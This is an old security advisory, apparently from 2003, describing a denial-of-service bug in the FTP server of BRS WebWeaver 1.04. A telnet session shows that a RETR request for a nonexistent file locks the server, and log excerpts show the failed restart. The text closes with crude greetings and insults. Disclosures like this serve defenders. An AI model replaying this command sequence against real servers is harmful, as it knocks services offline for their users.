=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: Ftpd Lockdown via RETR cmd
product: BRS WebWeaver 1.04 and prior
vendor: http://www.brswebweaver.com
risk: high
date: 04/23/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP 
advisory urls: http://f0kp.iplus.ru/bz/021.en.txt
               http://f0kp.iplus.ru/bz/021.ru.txt 
contact email: euronymous@iplus.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

BRS WebWeaver have a dumb bug when trying to access
object, that not existent, with RETR command. Normal 
behavior of ftp server will be print error message, 
but webweaver just locks himself. 

}-------- sample session -----------{

e@some_box$ telnet hostname 21
220 BRS WebWeaver FTP Server ready.
USER anonymous
331 Password required for anonymous.
PASS user@host
230 User anonymous logged in.  
RETR blah         
150 Opening data connection for blah.

}-------- sample session -----------{



Then i just close telnet session with webweaver and
try to connect server with ftp program.



}-------- sample session -----------{

e@some_box$ ftp hostname
Connection with hostname

}-------- sample session -----------{



That's all. Server is locked. No one can login in ftp 
server. If i try to restart ftp server, then in my 
log file will appear following:


}---------- from ftp.log -----------{

21/Apr/2003:17:30:27 - 195.**.***.** - User: anonymous - Disconnected 
FTP Server Stopped
21/Apr/2003:17:30:38 - ERROR: FTP Server Fail to Start
21/Apr/2003:17:30:38 - Error 10022 in function WSAASyncSelect
Invalid argument

}---------- from ftp.log -----------{


Therefore, to restart ftp server u must close webweaver (with http
server) and run it again.


shouts: DWC, DHG, HUNGOSH, security.nnov.ru, Black Tigerz Research Group,
The N0b0D1eS, all russian security guyz!! to kate especially )) 
f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb 
f*cking team
          

================
im not a lame,
not yet a hacker
================